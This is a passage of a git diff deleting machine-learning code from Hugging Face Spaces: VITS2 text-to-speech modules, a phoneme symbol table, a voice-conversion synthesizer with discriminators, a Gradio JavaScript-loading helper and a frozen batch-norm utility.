- """ - if y is None or y == []: - return [] - tag_regex = re.compile(r"^<\w+>[^<]+") - if tag_regex.search(y[-1][1]): - y[-1] = (convert_user(y[-1][0]), y[-1][1]) - else: - y[-1] = (convert_user(y[-1][0]), convert_mdtext(y[-1][1])) - return y - -with open("./assets/custom.js", "r", encoding="utf-8") as f, open("./assets/Kelpy-Codos.js", "r", encoding="utf-8") as f2: - customJS = f.read() - kelpyCodos = f2.read() - -def reload_javascript(): - print("Reloading javascript...") - js = f'' - def template_response(*args, **kwargs): - res = GradioTemplateResponseOriginal(*args, **kwargs) - res.body = res.body.replace(b'', f'{js}'.encode("utf8")) - res.init_headers() - return res - - gr.routes.templates.TemplateResponse = template_response - -GradioTemplateResponseOriginal = gr.routes.templates.TemplateResponse \ No newline at end of file diff --git a/spaces/chikoto/Umamusume-DeBERTa-VITS2-TTS-JP/modules.py b/spaces/chikoto/Umamusume-DeBERTa-VITS2-TTS-JP/modules.py deleted file mode 100644 index b1f89a2f837f190a3dd5de52e7a4e183f1024306..0000000000000000000000000000000000000000 --- a/spaces/chikoto/Umamusume-DeBERTa-VITS2-TTS-JP/modules.py +++ /dev/null @@ -1,597 +0,0 @@ -import math -import torch -from torch import nn -from torch.nn import functional as F - -from torch.nn import Conv1d -from torch.nn.utils import weight_norm, remove_weight_norm - -import commons -from commons import init_weights, get_padding -from transforms import piecewise_rational_quadratic_transform -from attentions import Encoder - -LRELU_SLOPE = 0.1 - - -class LayerNorm(nn.Module): - def __init__(self, channels, eps=1e-5): - super().__init__() - self.channels = channels - self.eps = eps - - self.gamma = nn.Parameter(torch.ones(channels)) - self.beta = nn.Parameter(torch.zeros(channels)) - - def forward(self, x): - x = x.transpose(1, -1) - x = F.layer_norm(x, (self.channels,), self.gamma, self.beta, self.eps) - return x.transpose(1, -1) - - -class ConvReluNorm(nn.Module): - def __init__( - self, - in_channels, - hidden_channels, - out_channels, - kernel_size, - n_layers, - p_dropout, - ): - super().__init__() - self.in_channels = in_channels - self.hidden_channels = hidden_channels - self.out_channels = out_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.p_dropout = p_dropout - assert n_layers > 1, "Number of layers should be larger than 0." 
- - self.conv_layers = nn.ModuleList() - self.norm_layers = nn.ModuleList() - self.conv_layers.append( - nn.Conv1d( - in_channels, hidden_channels, kernel_size, padding=kernel_size // 2 - ) - ) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.relu_drop = nn.Sequential(nn.ReLU(), nn.Dropout(p_dropout)) - for _ in range(n_layers - 1): - self.conv_layers.append( - nn.Conv1d( - hidden_channels, - hidden_channels, - kernel_size, - padding=kernel_size // 2, - ) - ) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.proj = nn.Conv1d(hidden_channels, out_channels, 1) - self.proj.weight.data.zero_() - self.proj.bias.data.zero_() - - def forward(self, x, x_mask): - x_org = x - for i in range(self.n_layers): - x = self.conv_layers[i](x * x_mask) - x = self.norm_layers[i](x) - x = self.relu_drop(x) - x = x_org + self.proj(x) - return x * x_mask - - -class DDSConv(nn.Module): - """ - Dialted and Depth-Separable Convolution - """ - - def __init__(self, channels, kernel_size, n_layers, p_dropout=0.0): - super().__init__() - self.channels = channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.p_dropout = p_dropout - - self.drop = nn.Dropout(p_dropout) - self.convs_sep = nn.ModuleList() - self.convs_1x1 = nn.ModuleList() - self.norms_1 = nn.ModuleList() - self.norms_2 = nn.ModuleList() - for i in range(n_layers): - dilation = kernel_size**i - padding = (kernel_size * dilation - dilation) // 2 - self.convs_sep.append( - nn.Conv1d( - channels, - channels, - kernel_size, - groups=channels, - dilation=dilation, - padding=padding, - ) - ) - self.convs_1x1.append(nn.Conv1d(channels, channels, 1)) - self.norms_1.append(LayerNorm(channels)) - self.norms_2.append(LayerNorm(channels)) - - def forward(self, x, x_mask, g=None): - if g is not None: - x = x + g - for i in range(self.n_layers): - y = self.convs_sep[i](x * x_mask) - y = self.norms_1[i](y) - y = F.gelu(y) - y = self.convs_1x1[i](y) - y = self.norms_2[i](y) - y = F.gelu(y) - y = self.drop(y) - x = x + y - return x * x_mask - - -class WN(torch.nn.Module): - def __init__( - self, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - p_dropout=0, - ): - super(WN, self).__init__() - assert kernel_size % 2 == 1 - self.hidden_channels = hidden_channels - self.kernel_size = (kernel_size,) - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - self.p_dropout = p_dropout - - self.in_layers = torch.nn.ModuleList() - self.res_skip_layers = torch.nn.ModuleList() - self.drop = nn.Dropout(p_dropout) - - if gin_channels != 0: - cond_layer = torch.nn.Conv1d( - gin_channels, 2 * hidden_channels * n_layers, 1 - ) - self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name="weight") - - for i in range(n_layers): - dilation = dilation_rate**i - padding = int((kernel_size * dilation - dilation) / 2) - in_layer = torch.nn.Conv1d( - hidden_channels, - 2 * hidden_channels, - kernel_size, - dilation=dilation, - padding=padding, - ) - in_layer = torch.nn.utils.weight_norm(in_layer, name="weight") - self.in_layers.append(in_layer) - - # last one is not necessary - if i < n_layers - 1: - res_skip_channels = 2 * hidden_channels - else: - res_skip_channels = hidden_channels - - res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1) - res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name="weight") - self.res_skip_layers.append(res_skip_layer) - - def forward(self, x, x_mask, g=None, **kwargs): - output = torch.zeros_like(x) - 
n_channels_tensor = torch.IntTensor([self.hidden_channels]) - - if g is not None: - g = self.cond_layer(g) - - for i in range(self.n_layers): - x_in = self.in_layers[i](x) - if g is not None: - cond_offset = i * 2 * self.hidden_channels - g_l = g[:, cond_offset : cond_offset + 2 * self.hidden_channels, :] - else: - g_l = torch.zeros_like(x_in) - - acts = commons.fused_add_tanh_sigmoid_multiply(x_in, g_l, n_channels_tensor) - acts = self.drop(acts) - - res_skip_acts = self.res_skip_layers[i](acts) - if i < self.n_layers - 1: - res_acts = res_skip_acts[:, : self.hidden_channels, :] - x = (x + res_acts) * x_mask - output = output + res_skip_acts[:, self.hidden_channels :, :] - else: - output = output + res_skip_acts - return output * x_mask - - def remove_weight_norm(self): - if self.gin_channels != 0: - torch.nn.utils.remove_weight_norm(self.cond_layer) - for l in self.in_layers: - torch.nn.utils.remove_weight_norm(l) - for l in self.res_skip_layers: - torch.nn.utils.remove_weight_norm(l) - - -class ResBlock1(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)): - super(ResBlock1, self).__init__() - self.convs1 = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[2], - padding=get_padding(kernel_size, dilation[2]), - ) - ), - ] - ) - self.convs1.apply(init_weights) - - self.convs2 = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=1, - padding=get_padding(kernel_size, 1), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=1, - padding=get_padding(kernel_size, 1), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=1, - padding=get_padding(kernel_size, 1), - ) - ), - ] - ) - self.convs2.apply(init_weights) - - def forward(self, x, x_mask=None): - for c1, c2 in zip(self.convs1, self.convs2): - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c1(xt) - xt = F.leaky_relu(xt, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c2(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs1: - remove_weight_norm(l) - for l in self.convs2: - remove_weight_norm(l) - - -class ResBlock2(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3)): - super(ResBlock2, self).__init__() - self.convs = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - ] - ) - self.convs.apply(init_weights) - - def forward(self, x, x_mask=None): - for c in self.convs: - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs: - remove_weight_norm(l) - - -class Log(nn.Module): - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = 
torch.log(torch.clamp_min(x, 1e-5)) * x_mask - logdet = torch.sum(-y, [1, 2]) - return y, logdet - else: - x = torch.exp(x) * x_mask - return x - - -class Flip(nn.Module): - def forward(self, x, *args, reverse=False, **kwargs): - x = torch.flip(x, [1]) - if not reverse: - logdet = torch.zeros(x.size(0)).to(dtype=x.dtype, device=x.device) - return x, logdet - else: - return x - - -class ElementwiseAffine(nn.Module): - def __init__(self, channels): - super().__init__() - self.channels = channels - self.m = nn.Parameter(torch.zeros(channels, 1)) - self.logs = nn.Parameter(torch.zeros(channels, 1)) - - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = self.m + torch.exp(self.logs) * x - y = y * x_mask - logdet = torch.sum(self.logs * x_mask, [1, 2]) - return y, logdet - else: - x = (x - self.m) * torch.exp(-self.logs) * x_mask - return x - - -class ResidualCouplingLayer(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - p_dropout=0, - gin_channels=0, - mean_only=False, - ): - assert channels % 2 == 0, "channels should be divisible by 2" - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.half_channels = channels // 2 - self.mean_only = mean_only - - self.pre = nn.Conv1d(self.half_channels, hidden_channels, 1) - self.enc = WN( - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - p_dropout=p_dropout, - gin_channels=gin_channels, - ) - self.post = nn.Conv1d(hidden_channels, self.half_channels * (2 - mean_only), 1) - self.post.weight.data.zero_() - self.post.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels] * 2, 1) - h = self.pre(x0) * x_mask - h = self.enc(h, x_mask, g=g) - stats = self.post(h) * x_mask - if not self.mean_only: - m, logs = torch.split(stats, [self.half_channels] * 2, 1) - else: - m = stats - logs = torch.zeros_like(m) - - if not reverse: - x1 = m + x1 * torch.exp(logs) * x_mask - x = torch.cat([x0, x1], 1) - logdet = torch.sum(logs, [1, 2]) - return x, logdet - else: - x1 = (x1 - m) * torch.exp(-logs) * x_mask - x = torch.cat([x0, x1], 1) - return x - - -class ConvFlow(nn.Module): - def __init__( - self, - in_channels, - filter_channels, - kernel_size, - n_layers, - num_bins=10, - tail_bound=5.0, - ): - super().__init__() - self.in_channels = in_channels - self.filter_channels = filter_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.num_bins = num_bins - self.tail_bound = tail_bound - self.half_channels = in_channels // 2 - - self.pre = nn.Conv1d(self.half_channels, filter_channels, 1) - self.convs = DDSConv(filter_channels, kernel_size, n_layers, p_dropout=0.0) - self.proj = nn.Conv1d( - filter_channels, self.half_channels * (num_bins * 3 - 1), 1 - ) - self.proj.weight.data.zero_() - self.proj.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels] * 2, 1) - h = self.pre(x0) - h = self.convs(h, x_mask, g=g) - h = self.proj(h) * x_mask - - b, c, t = x0.shape - h = h.reshape(b, c, -1, t).permute(0, 1, 3, 2) # [b, cx?, t] -> [b, c, t, ?] 
- - unnormalized_widths = h[..., : self.num_bins] / math.sqrt(self.filter_channels) - unnormalized_heights = h[..., self.num_bins : 2 * self.num_bins] / math.sqrt( - self.filter_channels - ) - unnormalized_derivatives = h[..., 2 * self.num_bins :] - - x1, logabsdet = piecewise_rational_quadratic_transform( - x1, - unnormalized_widths, - unnormalized_heights, - unnormalized_derivatives, - inverse=reverse, - tails="linear", - tail_bound=self.tail_bound, - ) - - x = torch.cat([x0, x1], 1) * x_mask - logdet = torch.sum(logabsdet * x_mask, [1, 2]) - if not reverse: - return x, logdet - else: - return x - - -class TransformerCouplingLayer(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - n_layers, - n_heads, - p_dropout=0, - filter_channels=0, - mean_only=False, - wn_sharing_parameter=None, - gin_channels=0, - ): - assert channels % 2 == 0, "channels should be divisible by 2" - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.half_channels = channels // 2 - self.mean_only = mean_only - - self.pre = nn.Conv1d(self.half_channels, hidden_channels, 1) - self.enc = ( - Encoder( - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - isflow=True, - gin_channels=gin_channels, - ) - if wn_sharing_parameter is None - else wn_sharing_parameter - ) - self.post = nn.Conv1d(hidden_channels, self.half_channels * (2 - mean_only), 1) - self.post.weight.data.zero_() - self.post.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels] * 2, 1) - h = self.pre(x0) * x_mask - h = self.enc(h, x_mask, g=g) - stats = self.post(h) * x_mask - if not self.mean_only: - m, logs = torch.split(stats, [self.half_channels] * 2, 1) - else: - m = stats - logs = torch.zeros_like(m) - - if not reverse: - x1 = m + x1 * torch.exp(logs) * x_mask - x = torch.cat([x0, x1], 1) - logdet = torch.sum(logs, [1, 2]) - return x, logdet - else: - x1 = (x1 - m) * torch.exp(-logs) * x_mask - x = torch.cat([x0, x1], 1) - return x - - x1, logabsdet = piecewise_rational_quadratic_transform( - x1, - unnormalized_widths, - unnormalized_heights, - unnormalized_derivatives, - inverse=reverse, - tails="linear", - tail_bound=self.tail_bound, - ) - - x = torch.cat([x0, x1], 1) * x_mask - logdet = torch.sum(logabsdet * x_mask, [1, 2]) - if not reverse: - return x, logdet - else: - return x diff --git a/spaces/chikoto/Umamusume-DeBERTa-VITS2-TTS-JP/text/symbols.py b/spaces/chikoto/Umamusume-DeBERTa-VITS2-TTS-JP/text/symbols.py deleted file mode 100644 index 161ae9f71275856a168cca1b8963a2aee875bb78..0000000000000000000000000000000000000000 --- a/spaces/chikoto/Umamusume-DeBERTa-VITS2-TTS-JP/text/symbols.py +++ /dev/null @@ -1,187 +0,0 @@ -punctuation = ["!", "?", "…", ",", ".", "'", "-"] -pu_symbols = punctuation + ["SP", "UNK"] -pad = "_" - -# chinese -zh_symbols = [ - "E", - "En", - "a", - "ai", - "an", - "ang", - "ao", - "b", - "c", - "ch", - "d", - "e", - "ei", - "en", - "eng", - "er", - "f", - "g", - "h", - "i", - "i0", - "ia", - "ian", - "iang", - "iao", - "ie", - "in", - "ing", - "iong", - "ir", - "iu", - "j", - "k", - "l", - "m", - "n", - "o", - "ong", - "ou", - "p", - "q", - "r", - "s", - "sh", - "t", - "u", - "ua", - "uai", - "uan", - "uang", - "ui", - "un", - "uo", - "v", - "van", - "ve", - "vn", - "w", - "x", - "y", - "z", - "zh", - "AA", - "EE", - "OO", -] -num_zh_tones = 6 - -# japanese -ja_symbols = [ - "N", - 
"a", - "a:", - "b", - "by", - "ch", - "d", - "dy", - "e", - "e:", - "f", - "g", - "gy", - "h", - "hy", - "i", - "i:", - "j", - "k", - "ky", - "m", - "my", - "n", - "ny", - "o", - "o:", - "p", - "py", - "q", - "r", - "ry", - "s", - "sh", - "t", - "ts", - "ty", - "u", - "u:", - "w", - "y", - "z", - "zy", -] -num_ja_tones = 1 - -# English -en_symbols = [ - "aa", - "ae", - "ah", - "ao", - "aw", - "ay", - "b", - "ch", - "d", - "dh", - "eh", - "er", - "ey", - "f", - "g", - "hh", - "ih", - "iy", - "jh", - "k", - "l", - "m", - "n", - "ng", - "ow", - "oy", - "p", - "r", - "s", - "sh", - "t", - "th", - "uh", - "uw", - "V", - "w", - "y", - "z", - "zh", -] -num_en_tones = 4 - -# combine all symbols -normal_symbols = sorted(set(zh_symbols + ja_symbols + en_symbols)) -symbols = [pad] + normal_symbols + pu_symbols -sil_phonemes_ids = [symbols.index(i) for i in pu_symbols] - -# combine all tones -num_tones = num_zh_tones + num_ja_tones + num_en_tones - -# language maps -language_id_map = {"ZH": 0, "JP": 1, "EN": 2} -num_languages = len(language_id_map.keys()) - -language_tone_start_map = { - "ZH": 0, - "JP": num_zh_tones, - "EN": num_zh_tones + num_ja_tones, -} - -if __name__ == "__main__": - a = set(zh_symbols) - b = set(en_symbols) - print(sorted(a & b)) diff --git a/spaces/chilge/Fushimi/models.py b/spaces/chilge/Fushimi/models.py deleted file mode 100644 index bdbce8445304abda792f235a4761b831fd6f4d12..0000000000000000000000000000000000000000 --- a/spaces/chilge/Fushimi/models.py +++ /dev/null @@ -1,351 +0,0 @@ -import copy -import math -import torch -from torch import nn -from torch.nn import functional as F - -import attentions -import commons -import modules - -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from commons import init_weights, get_padding -from vdecoder.hifigan.models import Generator -from utils import f0_to_coarse - -class ResidualCouplingBlock(nn.Module): - def __init__(self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append(modules.ResidualCouplingLayer(channels, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=gin_channels, mean_only=True)) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - -class Encoder(nn.Module): - def __init__(self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN(hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=gin_channels) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, 
g=None): - # print(x.shape,x_lengths.shape) - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - -class TextEncoder(nn.Module): - def __init__(self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - filter_channels=None, - n_heads=None, - p_dropout=None): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - self.f0_emb = nn.Embedding(256, hidden_channels) - - self.enc_ = attentions.Encoder( - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout) - - def forward(self, x, x_lengths, f0=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - x = self.pre(x) * x_mask - x = x + self.f0_emb(f0).transpose(1,2) - x = self.enc_(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - - return z, m, logs, x_mask - - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv2d(1, 32, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(32, 128, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(128, 512, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(512, 1024, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(1024, 1024, (kernel_size, 1), 1, padding=(get_padding(kernel_size, 1), 0))), - ]) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ]) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def 
forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2,3,5,7,11] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class SpeakerEncoder(torch.nn.Module): - def __init__(self, mel_n_channels=80, model_num_layers=3, model_hidden_size=256, model_embedding_size=256): - super(SpeakerEncoder, self).__init__() - self.lstm = nn.LSTM(mel_n_channels, model_hidden_size, model_num_layers, batch_first=True) - self.linear = nn.Linear(model_hidden_size, model_embedding_size) - self.relu = nn.ReLU() - - def forward(self, mels): - self.lstm.flatten_parameters() - _, (hidden, _) = self.lstm(mels) - embeds_raw = self.relu(self.linear(hidden[-1])) - return embeds_raw / torch.norm(embeds_raw, dim=1, keepdim=True) - - def compute_partial_slices(self, total_frames, partial_frames, partial_hop): - mel_slices = [] - for i in range(0, total_frames-partial_frames, partial_hop): - mel_range = torch.arange(i, i+partial_frames) - mel_slices.append(mel_range) - - return mel_slices - - def embed_utterance(self, mel, partial_frames=128, partial_hop=64): - mel_len = mel.size(1) - last_mel = mel[:,-partial_frames:] - - if mel_len > partial_frames: - mel_slices = self.compute_partial_slices(mel_len, partial_frames, partial_hop) - mels = list(mel[:,s] for s in mel_slices) - mels.append(last_mel) - mels = torch.stack(tuple(mels), 0).squeeze(1) - - with torch.no_grad(): - partial_embeds = self(mels) - embed = torch.mean(partial_embeds, axis=0).unsqueeze(0) - #embed = embed / torch.linalg.norm(embed, 2) - else: - with torch.no_grad(): - embed = self(last_mel) - - return embed - - -class SynthesizerTrn(nn.Module): - """ - Synthesizer for Training - """ - - def __init__(self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - ssl_dim, - n_speakers, - **kwargs): - - super().__init__() - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - self.ssl_dim = ssl_dim - self.emb_g = nn.Embedding(n_speakers, gin_channels) - - self.enc_p_ = 
TextEncoder(ssl_dim, inter_channels, hidden_channels, 5, 1, 16,0, filter_channels, n_heads, p_dropout) - hps = { - "sampling_rate": 32000, - "inter_channels": 192, - "resblock": "1", - "resblock_kernel_sizes": [3, 7, 11], - "resblock_dilation_sizes": [[1, 3, 5], [1, 3, 5], [1, 3, 5]], - "upsample_rates": [10, 8, 2, 2], - "upsample_initial_channel": 512, - "upsample_kernel_sizes": [16, 16, 4, 4], - "gin_channels": 256, - } - self.dec = Generator(h=hps) - self.enc_q = Encoder(spec_channels, inter_channels, hidden_channels, 5, 1, 16, gin_channels=gin_channels) - self.flow = ResidualCouplingBlock(inter_channels, hidden_channels, 5, 1, 4, gin_channels=gin_channels) - - def forward(self, c, f0, spec, g=None, mel=None, c_lengths=None, spec_lengths=None): - if c_lengths == None: - c_lengths = (torch.ones(c.size(0)) * c.size(-1)).to(c.device) - if spec_lengths == None: - spec_lengths = (torch.ones(spec.size(0)) * spec.size(-1)).to(spec.device) - - g = self.emb_g(g).transpose(1,2) - - z_ptemp, m_p, logs_p, _ = self.enc_p_(c, c_lengths, f0=f0_to_coarse(f0)) - z, m_q, logs_q, spec_mask = self.enc_q(spec, spec_lengths, g=g) - - z_p = self.flow(z, spec_mask, g=g) - z_slice, pitch_slice, ids_slice = commons.rand_slice_segments_with_pitch(z, f0, spec_lengths, self.segment_size) - - # o = self.dec(z_slice, g=g) - o = self.dec(z_slice, g=g, f0=pitch_slice) - - return o, ids_slice, spec_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, c, f0, g=None, mel=None, c_lengths=None): - if c_lengths == None: - c_lengths = (torch.ones(c.size(0)) * c.size(-1)).to(c.device) - g = self.emb_g(g).transpose(1,2) - - z_p, m_p, logs_p, c_mask = self.enc_p_(c, c_lengths, f0=f0_to_coarse(f0)) - z = self.flow(z_p, c_mask, g=g, reverse=True) - - o = self.dec(z * c_mask, g=g, f0=f0) - - return o diff --git a/spaces/chlab/interactive_kinematic_planet_detector/utils/vision_modifications.py b/spaces/chlab/interactive_kinematic_planet_detector/utils/vision_modifications.py deleted file mode 100644 index 14151748ba4a57cdfcfc64b4ba83c4d6009294bb..0000000000000000000000000000000000000000 --- a/spaces/chlab/interactive_kinematic_planet_detector/utils/vision_modifications.py +++ /dev/null @@ -1,310 +0,0 @@ -import warnings -from typing import Callable, List, Optional - -import torch -from torch import Tensor - -interpolate = torch.nn.functional.interpolate - - -class FrozenBatchNorm2d(torch.nn.Module): - """ - BatchNorm2d where the batch statistics and the affine parameters are fixed - - Args: - num_features (int): Number of features ``C`` from an expected input of size ``(N, C, H, W)`` - eps (float): a value added to the denominator for numerical stability. 
Default: 1e-5 - """ - - def __init__( - self, - num_features: int, - eps: float = 1e-5, - ): - super().__init__() - # _log_api_usage_once(self) - self.eps = eps - self.register_buffer("weight", torch.ones(num_features)) - self.register_buffer("bias", torch.zeros(num_features)) - self.register_buffer("running_mean", torch.zeros(num_features)) - self.register_buffer("running_var", torch.ones(num_features)) - - def _load_from_state_dict( - self, - state_dict: dict, - prefix: str, - local_metadata: dict, - strict: bool, - missing_keys: List[str], - unexpected_keys: List[str], - error_msgs: List[str], - ): - num_batches_tracked_key = prefix + "num_batches_tracked" - if num_batches_tracked_key in state_dict: - del state_dict[num_batches_tracked_key] - - super()._load_from_state_dict( - state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs - ) - - def forward(self, x: Tensor) -> Tensor: - # move reshapes to the beginning - # to make it fuser-friendly - w = self.weight.reshape(1, -1, 1, 1) - b = self.bias.reshape(1, -1, 1, 1) - rv = self.running_var.reshape(1, -1, 1, 1) - rm = self.running_mean.reshape(1, -1, 1, 1) - scale = w * 